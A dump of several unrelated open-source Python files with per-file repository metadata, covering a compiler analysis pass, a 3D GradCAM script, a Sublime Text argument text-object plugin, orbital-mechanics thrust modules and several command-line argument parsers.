                        bound_name = func_alias.args[0].id
                        func_alias = self.global_declarations[bound_name]
                    if func_alias is intrinsic.UnboundValue:
                        continue
                    if func_alias not in self.node_to_functioneffect:
                        continue
                    if func_alias is MODULES['functools']['partial']:
                        # functools.partial: effects come from the wrapped
                        # function when it can be identified unambiguously.
                        base_func_aliases = self.aliases[node.args[0]]
                        fe = self.node_to_functioneffect[func_alias]
                        if len(base_func_aliases) == 1:
                            base_func_alias = next(iter(base_func_aliases))
                            fe = self.node_to_functioneffect.get(
                                base_func_alias,
                                fe)
                    else:
                        fe = self.node_to_functioneffect[func_alias]
                    predecessors = self.result.predecessors(fe)
                    if self.current_function not in predecessors:
                        self.result.add_edge(
                            self.current_function,
                            fe,
                            effective_parameters=[],
                            formal_parameters=[])
                    edge = self.result.edges[self.current_function, fe]
                    edge["effective_parameters"].append(n)
                    edge["formal_parameters"].append(i)
        self.generic_visit(node)
| {
"repo_name": "serge-sans-paille/pythran",
"path": "pythran/analyses/argument_effects.py",
"copies": "1",
"size": "7686",
"license": "bsd-3-clause",
"hash": 3244019370482658300,
"line_mean": 39.03125,
"line_max": 76,
"alpha_frac": 0.549960968,
"autogenerated": false,
"ratio": 4.497366881217086,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5547327849217086,
"avg_score": null,
"num_lines": null
} |
# Environment/session setup for the Keras+TensorFlow GradCAM pipeline.
# NOTE(review): `os` and `GPU` (and model_no/channels/activation/voxelCount/
# nbClasses/example_no used later) are defined earlier in the file, outside
# this excerpt — confirm against the full source.
os.environ["KERAS_BACKEND"] = "tensorflow"
os.environ["CUDA_VISIBLE_DEVICES"] = GPU
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"  # silence TensorFlow C++ log spam
import tensorflow as tf
# Allocate GPU memory on demand rather than grabbing it all at startup.
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
from keras import backend as K
K.set_session(sess)
import keras
from keras.models import Sequential, model_from_json
from keras.layers.core import Dense, Dropout, Flatten
from keras.layers.convolutional import Convolution3D, MaxPooling3D, ZeroPadding3D
from keras.layers.normalization import BatchNormalization
import sys
import numpy as np
import scipy.io as sio
from GradCAM import prepareGradCAM, GradCAM, registerGradient, modifyBackprop, compileSaliencyFunction
from loadModel import loadModel
# Channel sub-directories: occupancy volume plus x/y/z surface normals.
p=['inouts','xNormals','yNormals','zNormals']
def loadFile(array, filename, xVoxelCount, yVoxelCount, zVoxelCount, channel):
    """Load one raw uint8 voxel volume into one channel of `array`.

    Reads `filename` as flat uint8 data, reshapes it to
    (xVoxelCount, yVoxelCount, zVoxelCount) in C order, scales to [0, 1],
    and stores it in array[0, :, :, :, channel].

    Bug fixes vs. the original:
    * the body indexed with the *global* name ``c`` instead of the
      ``channel`` parameter (it only worked because every caller's loop
      variable happened to be named ``c``); it now uses ``channel``.
    * ``u = os.path.join(p[c], filename)`` was computed but never used
      (np.fromfile read ``filename`` directly); the dead line is removed,
      which also drops the hidden dependency on the module globals ``p``
      and ``c``.  Behavior for existing callers is unchanged.
    """
    voxels = np.fromfile(filename, dtype=np.dtype('uint8'))
    voxels = np.reshape(voxels, (xVoxelCount, yVoxelCount, zVoxelCount), order='C')
    # Normalize uint8 [0, 255] to float [0.0, 1.0].
    array[0, :, :, :, channel] = voxels.astype('float') / 255.0
if __name__ == '__main__':
    # Load the trained 3D CNN and its weights for the configured
    # model/channel/activation/voxel/class combination.
    cnnModel = loadModel(model_no,channels,activation,voxelCount,nbClasses)
    cnnModel.load_weights('weights\model%s_%schannel_%sactivation_%svoxel_count_%sclasses.h5'%(model_no,channels,activation,voxelCount,nbClasses))
    # Popping the softmax layer as it creates ambiguity in the explanation
    cnnModel.pop()
    # The layer index of the last fully convolutional layer after removing the softmax layer
    layerIdx = -4
    # Keras functions for getting the GradCAM and guided GradCAM
    activationFunction=prepareGradCAM(cnnModel, layerIdx, nbClasses)
    saliency_fn = compileSaliencyFunction(cnnModel, model_no, channels, activation, voxelCount, nbClasses, activation_layer=-4)
    if example_no=="all":
        # Batch mode: run GradCAM over every raw example on disk.
        list_raw = glob.glob("Examples\inouts\*.raw")
        for fileidx, filename in enumerate (list_raw):
            array=np.zeros((1,voxelCount,voxelCount,voxelCount,channels))
            for c in range(channels):
                loadFile(array,filename,voxelCount, voxelCount, voxelCount, c)
            predicted_class = cnnModel.predict(array)
            print(filename,'has a predicted class',predicted_class)
            # Guided GradCAM = guided backprop modulated by the class activation map.
            attMap = GradCAM(activationFunction, array)
            gBackprop = saliency_fn([array, 0])
            gGradCam = gBackprop[0] * attMap[..., np.newaxis]
            gGradCam = (gGradCam / np.max(gGradCam))
            # Blend attention with the input volume and rescale to uint8.
            finalOutput = (1 * np.float32(gGradCam)) + 1*np.float32(array)
            finalOutput = (finalOutput / np.max(finalOutput))
            finalOutput*=255.0
            finalOutput.astype('uint8').tofile("GradCAM_outputs\\"+filename)
    else:
        # Single-example mode.
        filename="Examples/inouts/"+example_no+".raw"
        array=np.zeros((1,voxelCount,voxelCount,voxelCount,channels))
        for c in range(channels):
            loadFile(array,filename,voxelCount, voxelCount, voxelCount, c)
        predicted_class = cnnModel.predict(array)
        print(filename,'has a predicted class',predicted_class)
        attMap = GradCAM(activationFunction, array)
        gBackprop = saliency_fn([array, 0])
        gGradCam = gBackprop[0] * attMap[..., np.newaxis]
        # attMap*=255.0
        gGradCam = (gGradCam / np.max(gGradCam))
        finalOutput = (1 * np.float32(gGradCam)) + (1 * np.float32(array))
        finalOutput = (finalOutput / np.max(finalOutput))
        finalOutput*=255.0
        finalOutput.astype('uint8').tofile("GradCAM_outputs\\"+filename)
        print('attention map saved' )
| {
"repo_name": "AdamLabISU/3DGradCAM",
"path": "test.py",
"copies": "1",
"size": "4625",
"license": "bsd-3-clause",
"hash": -8603497841296469000,
"line_mean": 43.4711538462,
"line_max": 163,
"alpha_frac": 0.6951351351,
"autogenerated": false,
"ratio": 3.4132841328413286,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4608419267941329,
"avg_score": null,
"num_lines": null
} |
# Argument Noun
#
# Sublime Text plugin that extends Vintage mode with support
# for treating function arguments (including parameters) as
# an 'a' text noun.
#
# Usage:
# delete an argument by pressing "daa"
# change inner argument by pressing "cia"
# select inner argument by pressing "via"
#
# Copyright (c) 2013 Nils Liberg
# License: MIT License
import sublime, sublime_plugin
import re
def transform_selection_regions(view, f, **kwargs):
    """Replace every selection region in *view* with f(region, **kwargs)."""
    selection = view.sel()
    mapped = [f(region, **kwargs) for region in selection]
    selection.clear()
    for region in mapped:
        selection.add(region)
def remove_inner_parenthesis(s):
    ''' removes any inner parenthesis and also cuts off the string at the
        right hand side when the first non-matched ')' is reached '''
    out = []
    depth = 0
    for ch in s:
        if ch == '(':
            depth += 1
        elif ch == ')':
            depth -= 1
            # stop if end of parameter list reached
            if depth < 0:
                break
        # mask everything nested inside parentheses, preserving offsets
        out.append('_' if depth else ch)
    return ''.join(out)
def remove_tail(s):
    """Trim *s* so argument scanning does not run past the statement's end.

    Everything after the first semicolon is dropped.  Then, when two
    identifiers are separated only by whitespace containing a newline, a
    right parenthesis is assumed to be missing after the first one and is
    inserted in place of the first whitespace character, preserving all
    character offsets.
    """
    # remove all characters after semicolon
    s = re.sub(r'(?s);.*', '', s)

    # if there are two adjacent identifiers with only whitespace containing
    # a newline inbetween, assume a right parenthesis is missing after
    # the first identifier and insert one (while preserving character offsets)
    def repl_func(m):
        non_identifiers = [
            'mod', 'div', 'and', 'or', 'xor', 'not', 'if',
            'unless', 'else', 'const',
        ]
        # BUG FIX: the original condition read
        #     A and B and C or C
        # which, by operator precedence, reduces to just C and made the
        # non_identifiers keyword exclusion dead code.  Use the intended
        # conjunction.  (Note m.group(3) is a single character, so its
        # membership check is effectively always true; kept for symmetry.)
        if (m.group(1) not in non_identifiers
                and m.group(3) not in non_identifiers
                and '\n' in m.group(2)):
            return ''.join([m.group(1), ')', m.group(2)[1:], m.group(3)])
        else:
            return m.group(0)
    s = re.sub(r'([a-zA-Z_0-9]+)(\s+)([a-zA-Z_0-9])', repl_func, s)
    return s
class ViExpandToArguments(sublime_plugin.TextCommand):
    """Vintage-mode command implementing the 'a' (argument) text object.

    Expands each selection/caret to the function-call argument under it;
    `outer` also swallows the separating comma/whitespace (like Vim's 'aa'
    vs 'ia').
    """

    def run(self, edit, outer=False, repeat=1, multiline=True):
        # Apply the expansion `repeat` times (count prefix in Vintage).
        for i in range(repeat):
            transform_selection_regions(
                self.view, self.expand_region_to_argument,
                outer=outer, multiline=multiline
            )

    def expand_region_to_argument(self, region, outer=False, multiline=True):
        # determine where the cursor is placed and what surrounding
        # text fragment region to consider
        pt = region.a
        r = self.view.line(pt)
        if multiline:
            last_line = self.view.rowcol(self.view.size()-1)[0]
            line_no = self.view.rowcol(pt)[0]
            # make the region of interest span 10 lines backwards and forwards
            l_beg, l_end = (max(0, line_no-10),
                            min(last_line, line_no+10))
            r = self.view.line(self.view.text_point(l_beg, 0)).cover(
                self.view.line(self.view.text_point(l_end, 0)))
            # limit the region just in case the lines are very long
            r = r.intersection(sublime.Region(pt - 4000, pt + 4000))
        # extract the surrounding text and determine the offset
        # from the start of it where the cursor is placed
        s = self.view.substr(r)
        cursor_offset = pt - r.a
        # replace literal strings by placeholders so that offsets are
        # preserved but parenthesis and commmas within strings do not
        # affect the later steps
        s = s.replace("\\'", '_').replace('\\"', '!') # remove string escape codes
        s = re.sub(r'(?s)""".*?"""', lambda m: '!' * len(m.group(0)), s)
        s = re.sub(r"(?s)'''.*?'''", lambda m: '!' * len(m.group(0)), s)
        s = re.sub(r'".*?"', lambda m: '!' * len(m.group(0)), s)
        s = re.sub(r"'.*?'", lambda m: '!' * len(m.group(0)), s)
        # find offsets to the start of all non-empty argument lists that
        # precede the cursor
        offsets = [m.start(1) for m in re.finditer(
                       r'(?x)[a-zA-Z0-9_]+[!?]? \s* \( ( (?!\s*\))[^)] )', s)
                   if m.start(1) <= cursor_offset]
        if offsets:
            # pick the last argument list offset
            offset = offsets[-1]
            args_str = s[offset:]
            # trim the right part of the string at semicolons and at suspected
            # missing right parenthesis in order to decrease the risk that we
            # we go too far to the right.
            args_str = remove_tail(args_str)
            # remove any inner parenthesis: "a*min(b, c), d" ==> "a*min______, d"
            args_str = remove_inner_parenthesis(args_str)
            # find arguments by splitting at commas
            args = re.findall(r'[^,]+,?\s*|,\s*', args_str)
            # find the argument that matches the cursor offset
            i = offset
            for arg_i, arg in enumerate(args):
                if cursor_offset <= i + len(arg.rstrip(', ')):
                    # create a region that covers this argument
                    if not outer:
                        arg = arg.rstrip(', \t\r\n')
                    a = region.a - (cursor_offset - i)
                    b = a + len(arg)
                    # if the argument is the last one and outer mode is on,
                    # expand to the left to cover any whitespace or commas
                    if outer and arg_i == len(args)-1: #self.view.substr(b) == ')':
                        while self.view.substr(a - 1) in ', \t\r\n':
                            a -= 1
                    return sublime.Region(a, b)
                else:
                    i += len(arg)
        # No enclosing argument list found: leave the region unchanged.
        return region
| {
"repo_name": "nliberg/argument-noun",
"path": "argument_noun.py",
"copies": "1",
"size": "5661",
"license": "mit",
"hash": 7841227986467533000,
"line_mean": 38.0413793103,
"line_max": 83,
"alpha_frac": 0.5394806571,
"autogenerated": false,
"ratio": 3.753978779840849,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47934594369408484,
"avg_score": null,
"num_lines": null
} |
"""Argument of perigee change, with formulas developed by Pollard.
References
----------
* Pollard, J. E. "Simplified Approach for Assessment of Low-Thrust
Elliptical Orbit Transfers", 1997.
* Pollard, J. E. "Evaluation of Low-Thrust Orbital Maneuvers", 1998.
"""
import numpy as np
from poliastro.twobody.decorators import state_from_vector
from poliastro.util import norm, circular_velocity
def apsidal_precession(ss, J2):
    """Secular apsidal precession rate of orbit *ss* due to the J2 harmonic.

    Implements 3 n R^2 J2 (4 - 5 sin^2 i) / (4 a^2 (1 - e^2)^2).
    """
    inclination_term = 4 - 5 * np.sin(ss.inc) ** 2
    semilatus_sq = ss.a ** 2 * (1 - ss.ecc ** 2) ** 2
    return 3 * ss.n * ss.attractor.R ** 2 * J2 * inclination_term / (4 * semilatus_sq)
def guidance_law(f):
    """Guidance law from the model.

    Thrust is aligned with an inertially fixed direction perpendicular to the
    semimajor axis of the orbit.

    Parameters
    ----------
    f : float
        Magnitude of constant acceleration
    """
    @state_from_vector
    def a_d(t0, ss):
        # Build the local orbital frame from the state.
        r = ss.r.value
        v = ss.v.value
        radial = r / norm(r)
        h_vec = np.cross(r, v)
        orbit_normal = h_vec / norm(h_vec)
        tangential = np.cross(orbit_normal, radial)
        # Steering angle measured from the tangential direction.
        steer = ss.nu.value - np.pi / 2
        return f * (np.cos(steer) * tangential + np.sin(steer) * radial)

    return a_d
def delta_V(V, ecc, argp_0, argp_f, f, A):
    """Compute required increment of velocity.
    """
    delta_argp = argp_f - argp_0
    # Inverse drift rate per unit velocity, signed by the change direction.
    inv_rate = 3 * np.sign(delta_argp) * np.sqrt(1 - ecc ** 2) / (2 * ecc * V)
    return delta_argp / (inv_rate + A / f)
def extra_quantities(k, a, ecc, argp_0, argp_f, f, A=0.0):
    """Extra quantities given by the model.

    Returns the required velocity increment and the corresponding transfer
    time at constant acceleration ``f``.
    """
    circ_v = circular_velocity(k, a)
    dv = delta_V(circ_v, ecc, argp_0, argp_f, f, A)
    return dv, dv / f
if __name__ == '__main__':
    # Smoke check: print the J2 apsidal precession rate for the ISS orbit.
    from poliastro.examples import iss
    J2_EARTH = 0.0010826359
    print(apsidal_precession(iss, J2_EARTH))
| {
"repo_name": "Juanlu001/pfc-uc3m",
"path": "code/argp.py",
"copies": "1",
"size": "1864",
"license": "mit",
"hash": 7813391985060625000,
"line_mean": 22.3,
"line_max": 95,
"alpha_frac": 0.5659871245,
"autogenerated": false,
"ratio": 2.798798798798799,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3864785923298799,
"avg_score": null,
"num_lines": null
} |
"""Argument of perigee change, with formulas developed by Pollard.
References
----------
* Pollard, J. E. "Simplified Approach for Assessment of Low-Thrust
Elliptical Orbit Transfers", 1997.
* Pollard, J. E. "Evaluation of Low-Thrust Orbital Maneuvers", 1998.
"""
import numpy as np
from numba import njit
from numpy import cross
from numpy.linalg import norm
from poliastro.core.elements import rv2coe
from poliastro.core.thrust.change_argp import extra_quantities
def change_argp(k, a, ecc, argp_0, argp_f, f):
    """Guidance law from the model.

    Thrust is aligned with an inertially fixed direction perpendicular to the
    semimajor axis of the orbit.

    Parameters
    ----------
    f : float
        Magnitude of constant acceleration

    Returns
    -------
    a_d, delta_V, t_f : callable, float, float
        Perturbation acceleration a_d(t0, u_, k), total velocity increment,
        and time of flight (delta_V / f).
    """
    @njit
    def a_d(t0, u_, k):
        # u_ packs the state vector: first three entries are the position,
        # the last three the velocity.
        r = u_[:3]
        v = u_[3:]
        nu = rv2coe(k, r, v)[-1]  # true anomaly is the last element returned
        alpha_ = nu - np.pi / 2
        r_ = r / norm(r)
        w_ = cross(r, v) / norm(cross(r, v))  # orbit-normal unit vector
        s_ = cross(w_, r_)  # tangential unit vector
        accel_v = f * (np.cos(alpha_) * s_ + np.sin(alpha_) * r_)
        return accel_v

    delta_V, t_f = extra_quantities(k, a, ecc, argp_0, argp_f, f, A=0.0)

    return a_d, delta_V, t_f
| {
"repo_name": "poliastro/poliastro",
"path": "src/poliastro/twobody/thrust/change_argp.py",
"copies": "1",
"size": "1193",
"license": "mit",
"hash": 3962008808821241300,
"line_mean": 24.9347826087,
"line_max": 77,
"alpha_frac": 0.6060352054,
"autogenerated": false,
"ratio": 2.8816425120772946,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3987677717477295,
"avg_score": null,
"num_lines": null
} |
""" Argument parser for ConvNN """
import argparse as ap
def _args_parse():
""" Allows for command line hyperparameter inputs to models
Description
------------
--image_size: Sets up the size of a square image, default is 32*32 for CIFAR10
--features : Sizes of convolutional feature maps, the first one ought to be 3 corresponding to RGB channels
--norm : Batch-normalisation boolean flag (default is True)
--ptype : Specifies pooling type:
- 'max' (default) for max pooling
- 'average' for average pooling
--aug : Data augmentation boolean flag (default is False)
--dropout : Set dropout probability, p = 1.0 (default) implies nothing is dropped out
--optype : Specifies optimizer type, default set to 'ADAM', if anything else is chosen, RMSProp is used
--hsize : Specifies the size of the hidden layer in the fully connected layer that follows conv layers
--bsize : Specifies the batch size for training
Note
----
Assertions and exceptions are not added, please be careful in passing arguments. If in doubt, please allow default values.
For non-square images appropriate modifications need to be made in helper_nn.py
"""
parser = ap.ArgumentParser(description = 'Hyperparameters')
parser.add_argument('--image_size', type = int, dest = 'img_size',
action = 'store', default = 32)
parser.add_argument('--features', type = list, dest = 'conv_features',
action = 'store', default = [3, 64, 128, 256])
parser.add_argument('--norm', type = bool, dest = 'normalisation',
action = 'store', default = True)
parser.add_argument('--ptype', dest = 'pooling_type',
action = 'store', default = 'max')
parser.add_argument('--aug', type = bool, dest = 'augmentation',
action = 'store', default = False)
parser.add_argument('--dropout', dest = 'dropout_p',
action = 'store', default = 1.0)
parser.add_argument('--optype', type = str, dest = 'optimization',
action = 'store', default = 'ADAM')
parser.add_argument('--hsize', type = int, dest = 'hidden_layer_size',
action = 'store', default = 500)
parser.add_argument('--bsize', type = int, dest = 'batch_size',
action = 'store', default = 300)
parser.add_argument('--eta', type = float, dest = 'learning_rate',
action = 'store', default = 0.01)
flags = parser.parse_args()
return flags
| {
"repo_name": "kkothari93/convNN_CIFAR10",
"path": "parseargs_convnn.py",
"copies": "1",
"size": "2612",
"license": "mit",
"hash": -2332818924359955500,
"line_mean": 48.2830188679,
"line_max": 123,
"alpha_frac": 0.6068147014,
"autogenerated": false,
"ratio": 4.030864197530864,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9762095708441193,
"avg_score": 0.07511663809793426,
"num_lines": 53
} |
""" Argument parser for pp options. """
import re
from collections import namedtuple
from .api import Mods
# Spec for one parsable argument: the main regex, a ``name=value`` fallback
# regex, the conversion callable, and the default value.
Argument = namedtuple("Argument", "pattern kwarg_pattern type default")
# Matches two-letter mod acronyms (e.g. HD, HR) inside a mods string.
mods_names = re.compile(r"\w{2}")
# Template for the keyword form of an argument, e.g. ``acc=99.32``.
kwarg = r"{}=(?P<value>\S+)"
class RegexArgumentParser:
    """A minimal order-independent argument parser built on regexes."""

    def __init__(self):
        # Maps argument name -> Argument spec.
        self.arguments = {}

    def add(self, name, pattern, type, default=None):
        """ Adds an argument. The pattern must have a group. """
        compiled = re.compile(pattern, flags=re.IGNORECASE)
        kwarg_compiled = re.compile(kwarg.format(name))
        self.arguments[name] = Argument(pattern=compiled,
                                        kwarg_pattern=kwarg_compiled,
                                        type=type, default=default)

    def parse(self, *args):
        """ Parse arguments.

        :raise ValueError: An argument is invalid.
        """
        Namespace = namedtuple("Namespace", " ".join(self.arguments.keys()))
        parsed = {name: spec.default for name, spec in self.arguments.items()}

        # Match every user token against the registered argument specs.
        for token in args:
            for name, spec in self.arguments.items():
                # Skip any already assigned arguments (identity check, so a
                # parsed value equal to the default still counts as assigned
                # only when it is the very same object).
                if parsed[name] is not spec.default:
                    continue
                # Positional form, e.g. "99.32%".
                match = spec.pattern.fullmatch(token)
                if match:
                    parsed[name] = spec.type(match.group(1))
                    break
                # Keyword form, e.g. "acc=99.32".
                match = spec.kwarg_pattern.fullmatch(token)
                if match:
                    parsed[name] = spec.type(match.group("value"))
                    break
            else:
                # No spec consumed the token.
                raise ValueError("{} is an invalid argument.".format(token))

        return Namespace(**parsed)
def mods(s: str):
    """ Return a list of api.Mods from the given str. """
    mod_list = []
    # Find every two-letter acronym and resolve it to a Mods member,
    # ignoring acronyms that resolve to an already-added mod.
    for token in mods_names.findall(s):
        found = next(
            (m for m in Mods
             if m not in mod_list and m.name.lower() == token.lower()),
            None,
        )
        if found is not None:
            mod_list.append(found)
    return mod_list
# Module-level parser instance with every recognised pp argument registered.
# Each pattern must contain exactly one capture group (see RegexArgumentParser).
parser = RegexArgumentParser()
parser.add("acc", r"([0-9.]+)%", type=float)
parser.add("c300", r"(\d+)x300", type=int)
parser.add("c100", r"(\d+)x100", type=int, default=0)
parser.add("c50", r"(\d+)x50", type=int, default=0)
parser.add("misses", r"(\d+)(?:m|xm(?:iss)?)", type=int, default=0)
parser.add("combo", r"(\d+)x", type=int)
parser.add("mods", r"\+(\w+)", type=mods)
parser.add("score_version", r"(?:score)?v([12])", type=int, default=1)
parser.add("ar", r"ar([0-9.]+)", type=float)
parser.add("cs", r"cs([0-9.]+)", type=float)
parser.add("od", r"od([0-9.]+)", type=float)
parser.add("hp", r"hp([0-9.]+)", type=float)
# Raw string: "\d" in a plain literal is an invalid escape sequence
# (DeprecationWarning today, a SyntaxError in future Python versions).
parser.add("hits", r"(\d+)hits", type=int)
parser.add("pp", r"([0-9.]+)pp", type=float)
def parse(*args):
    """ Parse pp arguments. """
    # Delegate to the module-level RegexArgumentParser instance configured above.
    return parser.parse(*args)
| {
"repo_name": "PcBoy111/PCBOT",
"path": "plugins/osulib/args.py",
"copies": "2",
"size": "3243",
"license": "mit",
"hash": -7945878478429027000,
"line_mean": 31.7575757576,
"line_max": 89,
"alpha_frac": 0.5612087573,
"autogenerated": false,
"ratio": 3.710526315789474,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0005948911203002504,
"num_lines": 99
} |
'''Argument parsing module
'''
import argparse
import ast
import copy
import inspect
import logging
import re
import sys
from sphinxcontrib.napoleon import Config
from sphinxcontrib.napoleon.docstring import GoogleDocstring
from . import data, optimizer, train
__author__ = 'R Devon Hjelm'
__author_email__ = 'erroneus@gmail.com'
def parse_kwargs(f):
    """Extract keyword arguments and their default values from a callable.

    Parameters named ``self`` or ``kwargs`` and parameters without a default
    are ignored. Defaults are deep-copied so callers may mutate them freely.
    """
    sig = inspect.signature(f)
    kwargs = {}
    for name, param in sig.parameters.items():
        if name in ('self', 'kwargs'):
            continue
        if param.default == inspect.Parameter.empty:
            continue
        kwargs[param.name] = copy.deepcopy(param.default)
    return kwargs
def parse_inputs(f):
    """Return the names of a callable's required (no-default) parameters.

    Parameters named ``self`` or ``kwargs`` are ignored.
    """
    sig = inspect.signature(f)
    return [
        param.name
        for name, param in sig.parameters.items()
        if name not in ('self', 'kwargs')
        and param.default == inspect.Parameter.empty
    ]
def parse_docstring(f):
    """Map parameter names to help strings from *f*'s Google-style docstring.

    Side effect: assigns a placeholder docstring to *f* when it has none.
    """
    if f.__doc__ is None:
        f.__doc__ = 'TODO\n TODO'
    cleaned = inspect.cleandoc(f.__doc__)
    # Convert the Google-style docstring to reST and pull out the
    # ':param name: doc' lines emitted by napoleon.
    rst = str(GoogleDocstring(cleaned, Config()))
    matches = re.findall(r':param (?P<param>\w+): (?P<doc>.*)', rst)
    return {param_name: param_doc for param_name, param_doc in matches}
def parse_header(f):
    """Return the first two header lines of *f*'s docstring.

    Used as ``(help, description)`` by callers that unpack the result into
    two values. Side effect: assigns a placeholder docstring when *f* has
    none.
    """
    if f.__doc__ is None:
        f.__doc__ = 'TODO\n TODO'
    doc = inspect.cleandoc(f.__doc__)
    config = Config()
    google_doc = GoogleDocstring(doc, config)
    rst = str(google_doc)
    lines = [l for l in rst.splitlines() if len(l) > 0]
    if len(lines) >= 2:
        return lines[:2]
    elif len(lines) == 1:
        # Previously returned the bare string here, which broke callers that
        # unpack the result into (help, description) — a two-character string
        # would unpack into its characters, anything else would raise.
        return lines[0], None
    else:
        return None, None
# Harvest the default kwargs and per-argument help text from each subsystem's
# entry point (data pipeline, training loop, optimizer).
data_help = parse_docstring(data.setup)
data_args = parse_kwargs(data.setup)
train_help = parse_docstring(train.main_loop)
train_args = parse_kwargs(train.main_loop)
optimizer_help = parse_docstring(optimizer.setup)
optimizer_args = parse_kwargs(optimizer.setup)
# Grouped defaults and help, keyed by subsystem name; used when building the
# per-model command line arguments.
default_args = dict(data=data_args, optimizer=optimizer_args, train=train_args)
default_help = dict(data=data_help, optimizer=optimizer_help, train=train_help)
# Argument names reserved by the generic experiment parser; model kwargs must
# not collide with these.
_protected_args = ['arch', 'out_path', 'name', 'reload',
                   'args', 'copy_to_local', 'meta', 'config_file',
                   'clean', 'verbosity', 'test']
logger = logging.getLogger('cortex.parsing')
def make_argument_parser() -> argparse.ArgumentParser:
    '''Generic experiment parser.

    Generic parser takes the experiment yaml as the main argument, but has some
    options for reloading, etc. This parser can be easily extended using a
    wrapper method.

    Returns:
        argparse.parser

    '''
    # Wider help formatting so long option strings stay on one line.
    compact_help = lambda prog: argparse.HelpFormatter(
        prog, max_help_position=50, width=100)
    parser = argparse.ArgumentParser(formatter_class=compact_help)

    parser.add_argument(
        '-o', '--out_path', default=None,
        help=('Output path directory. All model results will go here. '
              'If a new directory, a new one will be '
              'created, as long as parent exists.'))
    parser.add_argument(
        '-n', '--name', default=None,
        help=('Name of the experiment. If given, base name of '
              'output directory will be `--name`. If not given, '
              'name will be the base name of the `--out_path`'))
    parser.add_argument('-r', '--reload', type=str, default=None,
                        help='Path to model to reload.')
    parser.add_argument('-a', '--autoreload', default=False,
                        action='store_true')
    parser.add_argument('-R', '--networks_to_reload', type=str, nargs='+',
                        default=None)
    parser.add_argument('-L', '--load_networks', type=str, default=None,
                        help=('Path to model to reload. Does not load args, '
                              'info, etc'))
    parser.add_argument('-m', '--meta', type=str, default=None)
    parser.add_argument('-c', '--config_file', default=None,
                        help=('Configuration yaml file. '
                              'See `exps/` for examples'))
    parser.add_argument('-k', '--clean', action='store_true', default=False,
                        help=('Cleans the output directory. '
                              'This cannot be undone!'))
    parser.add_argument('-v', '--verbosity', type=int, default=1,
                        help='Verbosity of the logging. (0, 1, 2)')
    parser.add_argument('-d', '--device', type=int, default=0)
    return parser
class StoreDictKeyPair(argparse.Action):
    """argparse action that parses ``k1=v1,,k2=v2`` strings into a dict.

    Values are interpreted with ``ast.literal_eval`` when possible and kept
    as plain strings otherwise.
    """

    def __call__(self, parser, namespace, values, option_string=None):
        parsed = {}
        for pair in values.split(',,'):
            key, raw_value = pair.split('=')
            try:
                parsed[key] = ast.literal_eval(raw_value)
            except ValueError:
                # Not a Python literal (e.g. a bare word): keep the string.
                parsed[key] = raw_value
        setattr(namespace, self.dest, parsed)
def str2bool(v):
    """Convert a command-line string to a boolean (case-insensitive).

    Raises argparse.ArgumentTypeError for unrecognised spellings.
    """
    lowered = v.lower()
    if lowered in ('yes', 'true', 't', 'y', '1'):
        return True
    if lowered in ('no', 'false', 'f', 'n', '0'):
        return False
    raise argparse.ArgumentTypeError('Boolean value expected.')
def _parse_model(model, subparser):
    """Add a model's hyperparameters and subsystem defaults to *subparser*.

    NOTE(review): this mutates module state — it rebinds the module-level
    ``default_args`` with the model's overrides applied, and pops the
    ``'model'`` key from ``model.defaults`` in place.
    """
    global default_args
    # Shallow-copy the model's kwargs so CLI-side changes don't alter the model.
    kwargs = dict((k, v) for k, v in model.kwargs.items())
    model_defaults = model.defaults
    # Model-scoped defaults override the kwargs directly (and are removed from
    # model.defaults so they are not applied again below).
    model_defaults_model = model.defaults.pop('model', {})
    update_args(model_defaults_model, kwargs)
    helps = model.help
    # One CLI option per model kwarg.
    for k, v in kwargs.items():
        help = helps.get(k, None)
        _parse_kwargs(k, v, help, subparser)
    # Copy the subsystem defaults, apply the model's remaining overrides, then
    # expose them as namespaced options (e.g. --d.batch_size).
    default_args = dict((k, v) for k, v in default_args.items())
    update_args(model_defaults, default_args)
    for key, args in default_args.items():
        _parse_defaults(key, args, subparser)
def _parse_defaults(key, args, subparser):
    """Add CLI options for one subsystem's defaults (data/optimizer/train).

    Options are namespaced as ``--<first letter of key>.<arg>`` (e.g.
    ``--d.source``) and stored on dest ``<key>.<arg>``. The option's type is
    derived from the default value's type.
    """
    for k, v in args.items():
        arg_str = '--' + key[0] + '.' + k
        help = default_help[key][k]
        dest = key + '.' + k
        if isinstance(v, dict):
            # Render the default dict into a compact metavar for --help.
            dstr = ',,'.join(
                ['{}={}'.format(k, str(v)) for k, v in v.items()])
            dstr = dstr.replace(' ', '')
            dstr = dstr.replace(']', '')
            dstr = dstr.replace('[', '')
            metavar = '<k1=v1>' + ' defaults={' + dstr + '})'
            subparser.add_argument(
                arg_str,
                dest=dest,
                default=None,
                action=StoreDictKeyPair,
                help=help,
                metavar=metavar)
        elif isinstance(v, bool) and not v:
            # Default-False booleans become plain flags.
            action = 'store_true'
            dest = key + '.' + k
            subparser.add_argument(arg_str, dest=dest,
                                   action=action, default=False,
                                   help=help)
        elif isinstance(v, bool):
            # Default-True booleans take an explicit true/false value.
            type_ = type(v)
            metavar = '<' + type_.__name__ + \
                '> (default=' + str(v) + ')'
            dest = key + '.' + k
            subparser.add_argument(
                arg_str,
                dest=dest,
                default=True,
                metavar=metavar,
                type=str2bool,
                help=help)
        else:
            # Everything else keeps its default's type (str when default is None).
            type_ = type(v) if v is not None else str
            metavar = '<' + type_.__name__ + \
                '> (default=' + str(v) + ')'
            subparser.add_argument(
                arg_str,
                dest=dest,
                default=v,
                metavar=metavar,
                type=type_,
                help=help)
def _parse_kwargs(k, v, help, subparser):
arg_str = '--' + k
choices = None
if isinstance(v, dict):
dstr = ',,'.join(
['{}={}'.format(k, str(v)) for k, v in v.items()])
dstr = dstr.replace(' ', '')
dstr = dstr.replace(']', '')
dstr = dstr.replace('[', '')
metavar = '<k1=v1>' + ' defaults={' + dstr + '})'
subparser.add_argument(
arg_str,
dest=k,
default=v,
action=StoreDictKeyPair,
help=help,
metavar=metavar)
elif isinstance(v, bool) and not v:
action = 'store_true'
